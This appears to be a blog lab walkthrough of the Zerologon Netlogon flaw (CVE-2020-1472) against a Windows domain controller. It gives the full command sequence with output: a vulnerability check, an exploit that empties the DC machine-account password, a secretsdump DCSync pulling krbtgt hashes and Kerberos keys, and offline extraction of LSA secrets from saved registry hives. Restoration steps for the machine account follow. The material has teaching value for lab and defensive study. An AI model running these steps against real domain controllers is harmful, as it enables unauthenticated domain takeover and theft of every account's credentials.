Administrator
Published 2025-06-25 / 5 views

5.3 CVE-2020-1472 Netlogon privilege escalation (Zerologon)

Zerologon is a flaw in the Netlogon Remote Protocol (MS-NRPC): ComputeNetlogonCredential uses AES-CFB8 with an all-zero IV, so for roughly one session key in 256 an all-zero client challenge yields an all-zero credential. An unauthenticated attacker with network access to the DC can simply retry the handshake until it succeeds, bind as the domain controller's own machine account, and set that account's password to the empty string. Everything below is run in a lab. Note that the exploit step leaves the DC with a machine-account password in AD that no longer matches the copy the DC keeps locally, which breaks the DC's own secure channel (and replication in a multi-DC domain) until it is restored, so section 3 is not optional.

1. Reproduction with the Python scripts

(1) Detecting the vulnerability

zerologon_tester.py (Secura's checker) only performs the NetrServerReqChallenge / NetrServerAuthenticate3 handshake with a zeroed challenge and credential, up to 2000 times; it changes nothing on the DC, so it is safe to run against production. The arguments are the DC's NetBIOS name and its IP address.

(base) ┌──(root㉿Kali)-[~/tools/CVE-2020-1472]
└─# python3 zerologon_tester.py WIN2019-DC3 10.10.4.8
Performing authentication attempts...
========================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.

2. Resetting the DC machine-account password (exploit)

cve-2020-1472-exploit.py repeats the same handshake and, once a zero credential is accepted, calls NetrServerPasswordSet2 to set the password of WIN2019-DC3$ in AD to the empty string. The DC's locally stored copy of the password (the LSA secret $MACHINE.ACC) is not touched; that is both why the DC is now broken and why the original value can be recovered in section 3.

(base) ┌──(root㉿Kali)-[~/tools]
└─# python3 cve-2020-1472-exploit.py WIN2019-DC3 10.10.4.8
Performing authentication attempts...
=================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit comple

Hash dump

With the machine-account password now empty, the credential to pass is the empty-string NT hash (31d6cfe0d16ae931b73c59d7e0c089c0; the LM half aad3b435b51404eeaad3b435b51404ee is the empty LM hash). The DC machine account holds replication rights, so secretsdump pulls NTDS secrets over DRSUAPI (DCSync). -just-dc-user limits the dump to krbtgt here, whose keys are enough for a golden ticket; any other account, including Administrator, could be requested the same way.

(base) ┌──(root㉿Kali)-[~/tools]
└─# secretsdump.py "sec/WIN2019-DC3$"@10.10.4.8 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "sec/krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

(base) ┌──(root㉿Kali)-[~/tools]
└─#

3. Restoring the DC machine account

(1) Export the three registry hives on the DC

The original machine password still lives in the DC's LSA secrets, so saving the SYSTEM, SAM and SECURITY hives (SYSTEM carries the boot key needed to decrypt the other two) is enough to recover it offline. This needs a local administrator session on the DC; in the lab it is done from the console, but the krbtgt or Administrator hash obtained above would give the same access over the network.

PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SYSTEM system.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SAM sam.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SECURITY security.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop>

secretsdump against the saved hives

Run offline with the LOCAL target. The $MACHINE.ACC entry is what matters: the first line is the raw UTF-16LE machine password (plain_password_hex), the second is its NT hash, which is the value the restore script needs.

(base) ┌──(root㉿Kali)-[~/test]
└─# secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x52481e6ce2013131841d5043b3110eb6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:27d86657f458a28aeed03655ba6a6137:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:5f0030005d00550060004800770040002e00260061006700320035005c006d0056007a0079002a002b006900440068002f0049002a006900440034002a00620051003700500048005a004c003f00640056005500650050003c0074006500670026002c00510041002d0048002200260066005a0046004d00650033004900320075006f003700490025003f003c00410039007700410059006c0047005a00430079002900240024005d0042004d0055006c003b003f002f004a00230025006f00230061006c006000470028002600650077004400720060004e005a007500770067002b0030002f003900730032007000
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e6cd7a62e91562c9a03411c327d87489
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbfa5e3ae33400580554e08da2c245d9164de9fbc
dpapi_userkey:0xe8a4e229ff0f4154a7803fcd95935e33718551a8
[*] NL$KM
 0000   1E B8 DC F1 C1 8A 90 6E  A9 73 12 C8 97 B1 F1 56   .......n.s.....V
 0010   BD 95 49 E0 F8 0B BE CB  DB CB 4D F9 E7 5E 18 B8   ..I.......M..^..
 0020   01 8E 73 41 64 2B 7C C8  F9 2F 30 51 D7 4C CA B5   ..sAd+|../0Q.L..
 0030   99 22 A1 36 2E 61 20 E6  F1 B3 7E FA 26 E9 5D 12   .".6.a ...~.&.].
NL$KM:1eb8dcf1c18a906ea97312c897b1f156bd9549e0f80bbecbdbcb4df9e75e18b8018e7341642b7cc8f92f3051d74ccab59922a1362e6120e6f1b37efa26e95d12
[*] Cleaning up...

(2) Restoring the original hash with Python

reinstall_original_pw.py authenticates with the now-empty password and calls NetrServerPasswordSet, which takes an NT hash (encrypted with the session key) rather than a plaintext, with the old hash e6cd7a62e91562c9a03411c327d87489 from the second $MACHINE.ACC line. This puts the AD copy back in sync with the DC's LSA copy. ErrorCode 0 in both responses confirms success; secretsdump against the DC with the restored hash is the quickest double-check.

(base) ┌──(root㉿Kali)-[~/tools/zerologon]
└─# python3 reinstall_original_pw.py WIN2019-DC3 10.10.4.8 e6cd7a62e91562c9a03411c327d87489
Performing authentication attempts...
=============================================================================================================================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
    Data:                            b'\xc1Gh6\xd3\x8c\x80{'
NegotiateFlags:                  556793855
AccountRid:                      1160
ErrorCode:                       0

server challenge b'\xc1h\x1bZ\x08Gd\x8e'
session key b'\xa1\xca\xfbF\xfc\nk@H\xd2\x10Yb^\xf3\x0b'
NetrServerPasswordSetResponse
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\xaa\xf6\r\xe7m-\x0c'
    Timestamp:                       0
ErrorCode:                       0

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

(base) ┌──(root㉿Kali)-[~/tools/zerologon]
└─#

PowerShell restore

Alternatively, from an elevated PowerShell session on the DC itself, Reset-ComputerMachinePassword generates a fresh machine-account password and writes it both to AD and to the local LSA secret, so no hash is needed at all. It prints nothing on success; verify with Test-ComputerSecureChannel afterwards.


PS C:\Users\Administrator.SEC\Desktop> Reset-ComputerMachinePassword
PS C:\Users\Administrator.SEC\Desktop>

